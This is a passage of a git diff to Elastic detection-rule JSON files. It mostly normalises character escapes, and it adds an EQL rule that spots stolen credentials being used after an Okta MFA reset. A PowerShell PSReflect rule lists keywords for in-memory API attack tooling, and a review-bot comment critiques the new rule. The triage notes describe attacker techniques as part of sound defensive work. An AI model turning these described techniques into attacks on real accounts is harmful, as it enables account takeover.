ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -100,7 +100,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/55d551c6-333b-4665-ab7e-5d14a59715ce_107.json b/packages/security_detection_engine/kibana/security_rule/55d551c6-333b-4665-ab7e-5d14a59715ce_107.json index d64af215e7c..37340a85686 100644 --- a/packages/security_detection_engine/kibana/security_rule/55d551c6-333b-4665-ab7e-5d14a59715ce_107.json 
+++ b/packages/security_detection_engine/kibana/security_rule/55d551c6-333b-4665-ab7e-5d14a59715ce_107.json @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -101,7 +101,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/55f07d1b-25bc-4a0f-aa0c-05323c1319d0_1.json b/packages/security_detection_engine/kibana/security_rule/55f07d1b-25bc-4a0f-aa0c-05323c1319d0_1.json index e3c147c91c2..c4d03c0c944 100644 --- a/packages/security_detection_engine/kibana/security_rule/55f07d1b-25bc-4a0f-aa0c-05323c1319d0_1.json +++ b/packages/security_detection_engine/kibana/security_rule/55f07d1b-25bc-4a0f-aa0c-05323c1319d0_1.json @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/56004189-4e69-4a39-b4a9-195329d226e9_1.json b/packages/security_detection_engine/kibana/security_rule/56004189-4e69-4a39-b4a9-195329d226e9_1.json index cdcf8419da6..8d7265a4002 100644 --- a/packages/security_detection_engine/kibana/security_rule/56004189-4e69-4a39-b4a9-195329d226e9_1.json +++ b/packages/security_detection_engine/kibana/security_rule/56004189-4e69-4a39-b4a9-195329d226e9_1.json @@ -36,7 +36,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/5610b192-7f18-11ee-825b-f661ea17fbcd_1.json b/packages/security_detection_engine/kibana/security_rule/5610b192-7f18-11ee-825b-f661ea17fbcd_1.json new file mode 100644 index 00000000000..a5bb9ec1b91 --- /dev/null 
+++ b/packages/security_detection_engine/kibana/security_rule/5610b192-7f18-11ee-825b-f661ea17fbcd_1.json 
@@ -0,0 +1,108 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects a sequence of suspicious activities on Windows hosts indicative of credential compromise, followed by efforts to undermine multi-factor authentication (MFA) and single sign-on (SSO) mechanisms for an Okta user account.", + "false_positives": [ + "A Windows administrator may have triggered a low-fidelity credential access alert during a legitimate administrative action. Following this, the administrator may have reset the MFA credentials for themselves and then logged into the Okta console for AD directory services integration management." + ], + "from": "now-12h", + "index": [ + "filebeat-*", + "logs-okta*", + ".alerts-security.*", + "logs-endpoint.events.*" + ], + "interval": "6h", + "language": "eql", + "license": "Elastic License v2", + "name": "Stolen Credentials Used to Login to Okta Account After MFA Reset", + "note": "## Triage and analysis\n\n### Investigating Stolen Credentials Used to Login to Okta Account After MFA Reset\n\nThis rule detects a sequence of suspicious activities on Windows hosts indicative of credential compromise, followed by efforts to undermine multi-factor authentication (MFA) and single sign-on (SSO) mechanisms for an Okta user account.\n\nTypically, adversaries initially extract credentials from targeted endpoints through various means. Subsequently, leveraging social engineering, they may seek to reset the MFA credentials associated with an Okta account, especially in scenarios where Active Directory (AD) services are integrated with Okta. Successfully resetting MFA allows the unauthorized use of stolen credentials to gain access to the compromised Okta account. The attacker can then register their own device for MFA, paving the way for unfettered access to the user's Okta account and any associated SaaS applications. 
This is particularly alarming if the compromised account has administrative rights, as it could lead to widespread access to organizational resources and configurations.\n\n#### Possible investigation steps:\n- Identify the user account associated with the Okta login attempt by examining the `user.name` field.\n- Identify the endpoint for the Credential Access alert for this user by examining the `host.name` and `host.id` fields from the alert document.\n- Cross-examine the Okta user and endpoint user to confirm that they are the same person.\n- Reach out to the user to confirm if they have intentionally reset their MFA credentials recently or asked for help in doing so.\n- If the user is unaware of the MFA reset, incident response may be required immediately to prevent further compromise.\n\n### False positive analysis:\n- A Windows administrator may have triggered a low-fidelity credential access alert during a legitimate administrative action. Following this, the administrator may have reset the MFA credentials for themselves and then logged into the Okta console for AD directory services integration management.\n\n### Response and remediation:\n- If confirmed that the user did not intentionally have their MFA factor reset, deactivate the user account.\n- After deactivation, reset the user's password and MFA factor to regain control of the account.\n - Ensure that all user sessions are stopped during this process.\n- Immediately reset the user's AD password as well if Okta does not sync back to AD.\n- Forensic analysis on the user's endpoint may be required to determine the root cause of the compromise and identify the scope of the compromise.\n- Review Okta system logs to identify any other suspicious activity associated with the user account, such as creation of a backup account.\n- With the device ID captured from the MFA factor reset, search across all Okta logs for any other activity associated with the device ID.\n\n## Setup", + "query": "sequence by 
user.name with maxspan=12h\n [any where host.os.type == \"windows\" and signal.rule.threat.tactic.name == \"Credential Access\"]\n [any where event.dataset == \"okta.system\" and okta.event_type == \"user.mfa.factor.update\"]\n [any where event.dataset == \"okta.system\" and okta.event_type: (\"user.session.start\", \"user.authentication*\")]\n", + "references": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://www.elastic.co/security-labs/testing-okta-visibility-and-detection-dorothy", + "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "okta", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "okta.event_type", + "type": "keyword" + }, + { + "ecs": false, + "name": "signal.rule.threat.tactic.name", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "5610b192-7f18-11ee-825b-f661ea17fbcd", + "setup": "The Okta and Elastic Defend fleet integration structured data is required to be compatible with this rule. 
Directory services integration in Okta with AD synced is also required for this rule to be effective as it relies on triaging `user.name` from Okta and Elastic Defend events.", + "severity": "high", + "tags": [ + "Tactic: Persistence", + "Use Case: Identity and Access Audit", + "Data Source: Okta", + "Data Source: Elastic Defend", + "Rule Type: Higher-Order Rule", + "Domain: Endpoint", + "Domain: Cloud" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1556", + "name": "Modify Authentication Process", + "reference": "https://attack.mitre.org/techniques/T1556/", + "subtechnique": [ + { + "id": "T1556.006", + "name": "Multi-Factor Authentication", + "reference": "https://attack.mitre.org/techniques/T1556/006/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 1 + }, + "id": "5610b192-7f18-11ee-825b-f661ea17fbcd_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/56557cde-d923-4b88-adee-c61b3f3b5dc3_102.json b/packages/security_detection_engine/kibana/security_rule/56557cde-d923-4b88-adee-c61b3f3b5dc3_102.json index 71af2f5fd0e..a2476c121e0 100644 --- a/packages/security_detection_engine/kibana/security_rule/56557cde-d923-4b88-adee-c61b3f3b5dc3_102.json +++ b/packages/security_detection_engine/kibana/security_rule/56557cde-d923-4b88-adee-c61b3f3b5dc3_102.json @@ -47,7 +47,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/56557cde-d923-4b88-adee-c61b3f3b5dc3_103.json b/packages/security_detection_engine/kibana/security_rule/56557cde-d923-4b88-adee-c61b3f3b5dc3_103.json index cf7dcb14625..5e48826df07 100644 
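Review bot: The last step of the `query` sequence, `okta.event_type: ("user.session.start", "user.authentication*")`, carries no outcome filter, so a failed authentication attempt following the factor update completes the sequence even though the rule name states the stolen credentials were used to log in; consider adding `and event.outcome == "success"` to that step if the Okta integration populates `event.outcome` for these events (verify against sample documents). The first step keys on `signal.rule.threat.tactic.name`, which `required_fields` itself records as `"type": "unknown"` — confirm that this legacy `signal.*` name still resolves in `.alerts-security.*` for the stack versions this package targets, since the current alert namespace is `kibana.alert.rule.*`. The join on `user.name` also deserves a sentence in `setup`: the description calls out MFA resets obtained through social engineering, and if a helpdesk-performed `user.mfa.factor.update` event carries the administrator rather than the targeted user in `user.name`, that scenario will not correlate with the endpoint alert. Lastly, `"from": "now-12h"` equals `maxspan=12h` with a 6h `interval`, so a sequence whose first event sits at the edge of the lookback can be missed; a slightly wider `from` is the usual remedy.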
--- a/packages/security_detection_engine/kibana/security_rule/56557cde-d923-4b88-adee-c61b3f3b5dc3_103.json +++ b/packages/security_detection_engine/kibana/security_rule/56557cde-d923-4b88-adee-c61b3f3b5dc3_103.json @@ -47,7 +47,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/565c2b44-7a21-4818-955f-8d4737967d2e_102.json b/packages/security_detection_engine/kibana/security_rule/565c2b44-7a21-4818-955f-8d4737967d2e_102.json index 7077ac200bc..a446b0b8b60 100644 --- a/packages/security_detection_engine/kibana/security_rule/565c2b44-7a21-4818-955f-8d4737967d2e_102.json +++ b/packages/security_detection_engine/kibana/security_rule/565c2b44-7a21-4818-955f-8d4737967d2e_102.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/565c2b44-7a21-4818-955f-8d4737967d2e_103.json b/packages/security_detection_engine/kibana/security_rule/565c2b44-7a21-4818-955f-8d4737967d2e_103.json index 3b1deb6d481..8abe286ca0b 100644 --- a/packages/security_detection_engine/kibana/security_rule/565c2b44-7a21-4818-955f-8d4737967d2e_103.json +++ b/packages/security_detection_engine/kibana/security_rule/565c2b44-7a21-4818-955f-8d4737967d2e_103.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/565c2b44-7a21-4818-955f-8d4737967d2e_104.json b/packages/security_detection_engine/kibana/security_rule/565c2b44-7a21-4818-955f-8d4737967d2e_104.json index 1558b141dd7..4633a753c72 100644 
--- a/packages/security_detection_engine/kibana/security_rule/565c2b44-7a21-4818-955f-8d4737967d2e_104.json +++ b/packages/security_detection_engine/kibana/security_rule/565c2b44-7a21-4818-955f-8d4737967d2e_104.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/565c2b44-7a21-4818-955f-8d4737967d2e_105.json b/packages/security_detection_engine/kibana/security_rule/565c2b44-7a21-4818-955f-8d4737967d2e_105.json index 88dee0966f1..6eb96f85e46 100644 --- a/packages/security_detection_engine/kibana/security_rule/565c2b44-7a21-4818-955f-8d4737967d2e_105.json +++ b/packages/security_detection_engine/kibana/security_rule/565c2b44-7a21-4818-955f-8d4737967d2e_105.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/565d6ca5-75ba-4c82-9b13-add25353471c_102.json b/packages/security_detection_engine/kibana/security_rule/565d6ca5-75ba-4c82-9b13-add25353471c_102.json index c0376f3abfd..00dd0af2bd4 100644 --- a/packages/security_detection_engine/kibana/security_rule/565d6ca5-75ba-4c82-9b13-add25353471c_102.json +++ b/packages/security_detection_engine/kibana/security_rule/565d6ca5-75ba-4c82-9b13-add25353471c_102.json 
@@ -42,7 +42,7 @@ ], "risk_score": 73, "rule_id": "565d6ca5-75ba-4c82-9b13-add25353471c", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/565d6ca5-75ba-4c82-9b13-add25353471c_103.json b/packages/security_detection_engine/kibana/security_rule/565d6ca5-75ba-4c82-9b13-add25353471c_103.json index b9905266d50..4bc4f194137 100644 --- a/packages/security_detection_engine/kibana/security_rule/565d6ca5-75ba-4c82-9b13-add25353471c_103.json +++ b/packages/security_detection_engine/kibana/security_rule/565d6ca5-75ba-4c82-9b13-add25353471c_103.json 
@@ -42,7 +42,7 @@ ], "risk_score": 73, "rule_id": "565d6ca5-75ba-4c82-9b13-add25353471c", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/565d6ca5-75ba-4c82-9b13-add25353471c_104.json b/packages/security_detection_engine/kibana/security_rule/565d6ca5-75ba-4c82-9b13-add25353471c_104.json index 652dd047e91..b7b2b26e509 100644 --- a/packages/security_detection_engine/kibana/security_rule/565d6ca5-75ba-4c82-9b13-add25353471c_104.json +++ b/packages/security_detection_engine/kibana/security_rule/565d6ca5-75ba-4c82-9b13-add25353471c_104.json 
@@ -42,7 +42,7 @@ ], "risk_score": 73, "rule_id": "565d6ca5-75ba-4c82-9b13-add25353471c", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/565d6ca5-75ba-4c82-9b13-add25353471c_105.json b/packages/security_detection_engine/kibana/security_rule/565d6ca5-75ba-4c82-9b13-add25353471c_105.json index 3d0be8e33cc..1f806eadd72 100644 --- a/packages/security_detection_engine/kibana/security_rule/565d6ca5-75ba-4c82-9b13-add25353471c_105.json +++ b/packages/security_detection_engine/kibana/security_rule/565d6ca5-75ba-4c82-9b13-add25353471c_105.json 
@@ -41,7 +41,7 @@ ], "risk_score": 73, "rule_id": "565d6ca5-75ba-4c82-9b13-add25353471c", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/565d6ca5-75ba-4c82-9b13-add25353471c_106.json b/packages/security_detection_engine/kibana/security_rule/565d6ca5-75ba-4c82-9b13-add25353471c_106.json index caf3e32ea05..00bb1c91f66 100644 --- a/packages/security_detection_engine/kibana/security_rule/565d6ca5-75ba-4c82-9b13-add25353471c_106.json +++ b/packages/security_detection_engine/kibana/security_rule/565d6ca5-75ba-4c82-9b13-add25353471c_106.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", 
diff --git a/packages/security_detection_engine/kibana/security_rule/5663b693-0dea-4f2e-8275-f1ae5ff2de8e_103.json b/packages/security_detection_engine/kibana/security_rule/5663b693-0dea-4f2e-8275-f1ae5ff2de8e_103.json index e18da20ae0f..aee53f02ba2 100644 --- a/packages/security_detection_engine/kibana/security_rule/5663b693-0dea-4f2e-8275-f1ae5ff2de8e_103.json +++ b/packages/security_detection_engine/kibana/security_rule/5663b693-0dea-4f2e-8275-f1ae5ff2de8e_103.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/5663b693-0dea-4f2e-8275-f1ae5ff2de8e_104.json b/packages/security_detection_engine/kibana/security_rule/5663b693-0dea-4f2e-8275-f1ae5ff2de8e_104.json index abc96782c64..5417e3fdf6c 100644 --- a/packages/security_detection_engine/kibana/security_rule/5663b693-0dea-4f2e-8275-f1ae5ff2de8e_104.json +++ b/packages/security_detection_engine/kibana/security_rule/5663b693-0dea-4f2e-8275-f1ae5ff2de8e_104.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_105.json b/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_105.json index 4bc5b4a6be2..55dec6bce36 100644 --- a/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_105.json +++ b/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_105.json 
@@ -15,7 +15,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "PowerShell PSReflect Script", - "note": "## Triage and analysis\n\n### Investigating PowerShell PSReflect Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nPSReflect is a library that enables PowerShell to access win32 API functions in an uncomplicated way. It also helps to create enums and structs easily\u2014all without touching the disk.\n\nAlthough this is an interesting project for every developer and admin out there, it is mainly used in the red team and malware tooling for its capabilities.\n\nDetecting the core implementation of PSReflect means detecting most of the tooling that uses Windows API through PowerShell, enabling defenders to discover tools being dropped in the environment.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics. The script content that may be split into multiple script blocks (you can use the field `powershell.file.script_block_id` for filtering).\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Check for additional PowerShell and command-line logs that indicate that imported functions were run.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell Suspicious Discovery Related Windows API Functions - 61ac3638-40a3-44b2-855a-985636ca985e\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n- PowerShell Suspicious Script with Audio Capture Capabilities - 2f2f4939-0b34-40c2-a0a3-844eb7889f43\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell Suspicious Script with Screenshot Capabilities - 959a7353-1129-4aa7-9084-30746b256a70\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating PowerShell PSReflect Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nPSReflect is a library that enables PowerShell to access win32 API functions in an uncomplicated way. It also helps to create enums and structs easily\u2014all without touching the disk.\n\nAlthough this is an interesting project for every developer and admin out there, it is mainly used in the red team and malware tooling for its capabilities.\n\nDetecting the core implementation of PSReflect means detecting most of the tooling that uses Windows API through PowerShell, enabling defenders to discover tools being dropped in the environment.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics. 
The script content that may be split into multiple script blocks (you can use the field `powershell.file.script_block_id` for filtering).\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Check for additional PowerShell and command-line logs that indicate that imported functions were run.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell Suspicious Discovery Related Windows API Functions - 61ac3638-40a3-44b2-855a-985636ca985e\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n- PowerShell Suspicious Script with Audio Capture Capabilities - 2f2f4939-0b34-40c2-a0a3-844eb7889f43\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell Suspicious Script with Screenshot Capabilities - 959a7353-1129-4aa7-9084-30746b256a70\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text:(\n \"New-InMemoryModule\" or\n \"Add-Win32Type\" or\n psenum or\n DefineDynamicAssembly or\n DefineDynamicModule or\n \"Reflection.TypeAttributes\" or\n \"Reflection.Emit.OpCodes\" or\n \"Reflection.Emit.CustomAttributeBuilder\" or\n \"Runtime.InteropServices.DllImportAttribute\"\n ) and not user.id : \"S-1-5-18\"\n", "references": [ "https://github.com/mattifestation/PSReflect/blob/master/PSReflect.psm1", 
@@ -51,7 +51,7 @@ ], "risk_score": 47, "rule_id": "56f2e9b5-4803-4e44-a0a4-a52dc79d57fe", - "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_106.json b/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_106.json index a37cd2036d5..fa97f0dcee7 100644 --- a/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_106.json +++ 